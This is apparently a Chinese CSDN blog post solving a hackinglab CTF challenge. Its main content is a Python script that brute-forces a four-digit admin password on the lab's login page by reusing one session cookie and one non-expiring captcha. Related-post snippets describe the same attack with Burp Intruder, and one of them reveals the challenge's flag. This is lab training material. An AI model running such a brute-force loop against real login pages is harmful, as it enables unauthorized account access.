逗比验证码第一期

最新推荐文章于 2021-03-16 21:50:50 发布
最新推荐文章于 2021-03-16 21:50:50 发布
阅读量385 收藏
点赞数
分类专栏: 靶场学习 文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43220691/article/details/104211903
版权 
import requests


def main():
    url = 'http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php'
    cookie = 'PHPSESSID=edfa40caf5e428d9bd6f47588f5a3b6e'
    proxies = {'http':'http://127.0.0.1:8080'}
    headers = {'Host': 'lab1.xseclab.com',
               'User-Agent': 'Mozilla/5.0(X11;Linux x86_64;rv:68.0)Gecko/20100101 Firefox/68.0',
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
               'Accept-Language':'zh-CN,en-US;q=0.7,en;q=0.3',
               'Accept-Encoding': 'gzip, deflate',
               'Referer': 'http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php',
               'Content-Type':'application/x-www-form-urlencoded',
               'Content-Length': '48',
               'Connection': 'close',
               'cookie': cookie,
               'Upgrade-Insecure-Requests': '1'
               }
    key = 1000
    while key < 10000:
        data = {'username': 'admin', 'pwd': str(key),'vcode': 'q9nd','submit': 'submit'}
        r = requests.post(url, headers=headers,data=data,proxies=proxies)
        key = key + 1
        if r.text != 'pwd error':
            print(r.text)
            print(key)
            break


if __name__ == '__main__':
    main()
挖沟小能手
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全实验室 CTF 脚本关
Risk2S的小博客
07-16 1295
逗比验证码第一期 分值: 100 逗比验证码,有没有难道不一样吗? http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php 直接爆破: burpsuite, key is LJLJL789sdf#@sd逗比验证码第二期 分值: 150 验证便失效的验证码 http://lab1.xs
hackinglab-脚本关5——逗比验证码第一期
Ifish的博客
07-23 1464
逗比验证码第一期 题目描述 解题思路 1、打开发现是一个模拟登陆界面 2、随意输了一个四位纯数字密码,提示密码错误 估计就是要暴力破解了,刚才题目又提示验证码有没有都一样,所以应该是可以绕过 3、抓包 发现这个验证码可以只输一次,不过期 所以爆破 4、使用burp suite的Intruder 5、添加爆破的变量 6、设置密码的范围 7、...
逗比验证码第一期以及各种问题解决方案
weixin_47276609的博客
03-16 303
题目连接 http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php 1 首先登陆进去是这个界面 2 尝试登陆寻找漏洞 这里没有输入验证码,但与输入验证码报错一致,所以可以猜测此处有漏洞 3 开启代理使用burp尝试爆破 拦截 4 对密码进行爆破 设置爆破对象为数字型,从999开始到9999(因为题目提示密码是是4位纯数字数,第一位不为0 )步数为1 此处为此选项控制攻击能够发出的并发请求数。 把原来的5改成
CTF-网络信息安全攻防学习平台(脚本关)
凝聚力安全团队
07-02 3505
脚本关第一关 题库地址:http://hackinglab.cn 第一关 题目:         key又又找不到了         key分值: 200         key小明这次哭了,key又找不到了!!! key啊,你究竟藏到了哪里,为什么我看到的页面上都没
HTML5逗比测试手机游戏特效代码
03-20
在本案例中,“HTML5逗比测试手机游戏特效代码”指的是一个利用HTML5技术开发的手机游戏源码,旨在娱乐用户,测试他们的“逗比”程度。这个游戏可能包含了一系列趣味性的互动元素和动画效果,这些都是通过HTML5的新...
逗比Aria2脚本备份
08-29
仅用于给无法访问的小伙伴们进行镜像下载使用,禁止用于商业用途!
HTML5小游戏【dbcs逗比测试小游戏】游戏源码分享下载 - dbcs.zip
最新发布
05-29
--- dbcs.zipHTML5小游戏【dbcs逗比测试小游戏】游戏源码分享下载 --- dbcs.zipHTML5小游戏【dbcs逗比测试小游戏】游戏源码分享下载 --- dbcs.zipHTML5小游戏【dbcs逗比测试小游戏】游戏源码分享下载 --- dbcs....
嗷大喵逗比表情包下载 嗷大喵逗比表情包 动态版
11-08
嗷大喵是一只小三角形耳朵的白猫咪,嗷大喵逗比表情包是一款非常可爱又搞怪的猫咪表情,它能卖得了萌也能猥琐搞怪吸烟等,下面是小凡整理的嗷大喵gif表情,需要的自取哦。
逗比锁电脑开机密码生成器
12-09
逗比锁电脑开机密码生成器
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
逗比验证码,有没有难道不一样吗?
公众号shadow sock7
06-07 2784
leve5参考: http://www.cnblogs.com/renzongxian/p/5618631.html 使用sniper(狙击手)模式,对pwd字段进行暴力破解。 最后从得到的结果中按照正则匹配的error进行排序,得到一个不匹配的,然后得到了key。 这题没有我想象的难,因为可以使用同一个cookie,同一个验证码来进行破解,开始我还在用python脚本,然后想破解验证码
网络信息安全攻防学习平台
Style_tan的专栏
04-10 2153
记录一些网络信息安全攻防题目的一些思路方法 附上链接:http://hackinglab.cn/
网络安全实验室-------------------逗比验证码第二期
大方子
09-06 562
=========================== 个人收获: 1.验证码验证成功一次后为空,可能绕过验证码验证   ===========================       先输入一次正确的验证码抓包然后在里面发送一次,之后把验证保持为空就可以绕过   然后用intruder爆破即可   python密码生成代码 import itertoo...
脚本关5 逗比验证码第一期
kelisiyuan的博客
12-10 345
内容是一个表单,填写随机密码和验证码后、 提示错误== ,抓包看看
[hackinglab] 逗比验证码第二期
Selukwe的博客
05-29 2054
逗比验证码第二期 分值: 150 验证便失效的验证码 通关地址:http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php 登陆一下,用burp抓包 将这个登录请求导入Repeater,经测试,把验证码删掉,可以正常发送请求。 原因应该是请求头包含了两句: Connection: ke
网络安全实验室—脚本关
javonne
05-06 2381
key又又找不到了 分值: 200 小明这次哭了,key又找不到了!!! key啊,你究竟藏到了哪里,为什么我看到的页面上都没有啊!!!!!! 工具:burp suite 用burp抓包 key is : yougotit_script_now 这个题目是空的 分值: 100 Tips:这个题目真不是随便设置的。 什么才是空的呢? 通关地址:没有,请直接提交答案(小写即可) ...
写一个python脚本,读取csv文件的第二列以逗分割,第二列为时间戳再按照第二列数据排序
07-13
以下是一个示例脚本,它可以读取一个CSV文件的第二列,并按照第二列的时间戳对数据进行排序: ```python import csv def sort_csv_by_timestamp(csv_file): with open(csv_file, 'r') as file: reader = csv....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值